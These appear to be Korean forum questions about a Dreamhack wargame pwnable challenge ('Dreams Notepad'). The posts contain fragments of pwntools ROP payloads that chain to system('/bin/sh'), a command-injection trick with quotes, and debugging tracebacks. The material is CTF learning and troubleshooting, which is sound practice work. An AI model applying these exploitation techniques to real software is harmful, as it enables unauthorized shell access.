`binsh = libc_base + 0x18ce57 payload = p64(system) + p64(binsh)` ROP 과정에서 위와 같이 전송하면 익스가 안되는데 p.send(p64(system) + b'/bin/sh\x00') 위와 같이 전송하면 익스가 됩니다. 차이가 뭔가요? 언제는 문자열로 전송하고 언제는 주소로 전송해야 하나요?

local에서 실행하면 정상적으로 leak이 되는데, 서버에 접속하면, 아래의 p.recvuntil(b"Bye Bye!!:-)\n") 에서 socket connection 오류가 발생합니다. time sleep을 길게 줘도 문제는 동일한데, 어떤 원인인지 알수 있을까요? p.sendlineafter(b'-----Enter the content-----\n', b'aaaa') p.sendlineafter(b'-----Leave a message-----\n', payload1) p.recvuntil(b"Bye Bye!!:-)\n") Traceback (most recent call last): File "/home/lima36/.local/lib/python3.10/site-packages/pwnlib/tubes/sock.py", line 39, in recv_raw data = self.sock.recv(numb, *a) ConnectionResetError: [Errno 104] Connection reset by peer During handling of the above exception, another exception occurred: Traceback (most recent call last): File "/mnt/d/Work/dreamhack2/Dreams Notepad/solver.py", line 55, in <module> p.recvuntil(b"Bye Bye!!:-)\n") File "/home/lima36/.local/lib/python3.10/site-packages/pwnlib/tubes/tube.py", line 341, in recvuntil res = self.recv(timeout=self.timeout) File "/home/lima36/.local/lib/python3.10/site-packages/pwnlib/tubes/tube.py", line 106, in recv return self._recv(numb, timeout) or b'' File "/home/lima36/.local/lib/python3.10/site-packages/pwnlib/tubes/tube.py", line 176, in _recv if not self.buffer and not self._fillbuffer(timeout): File "/home/lima36/.local/lib/python3.10/site-packages/pwnlib/tubes/tube.py", line 155, in _fillbuffer data = self.recv_raw(self.buffer.get_fill_size()) File "/home/lima36/.local/lib/python3.10/site-packages/pwnlib/tubes/sock.py", line 48, in recv_raw raise EOFError EOFError [*] Closed connection to host3.dreamhack.games port 20396

안녕하세요! 저는 이 문제를 Command Injection + ROP로 풀었는데요, 다른 분들의 풀이를 살펴보다 출제자님의 풀이가 잘 이해되지 않아 질문을 올립니다. 출제자님의 풀이는 https://dreamhack.io/wargame/challenges/405/?writeup_id=6102 에 있습니다. 출제자님은 /home/Dnote/note 파일이 생성되지 않도록 하기 위해 프로그램이 실행하는 command가 echo ' >s /home/Dnote/note 가 되도록 하셨는데, 이렇게 command를 바꾸면 왜 파일이 생성되지 않는지 알고 싶습니다. linux command에서 '가 무슨 의미인지도 알고 싶습니다!!

not foundSyntax error: "}" 플래그 값이 출력되다가 이렇게 되네요 umm....

스포방지 . . . . . . . . . payload = b'A' * 0x1e0 payload += b'B' * 8 payload += p64(ret) payload += p64(pop_rdi) payload += p64(binsh) payload += p64(system) p.sendafter(b'-----Leave a message-----\n', payload) 함수와 문자열의 주소도 다 구하고, 백틱으로 텍스트 파일이 생기지 않게 한 뒤 익스 코드를 보내니 쉘이 안따지고 [*] Switching to interactive mode [DEBUG] Received 0xe bytes: b'\n' b'Bye Bye!!:-)\n' 이렇게 출력이 되는데 왜 이런거고 위의 문자열이 출력되지 않고 쉘을 따려면 어떻게 해야할지 알 수 있을까요?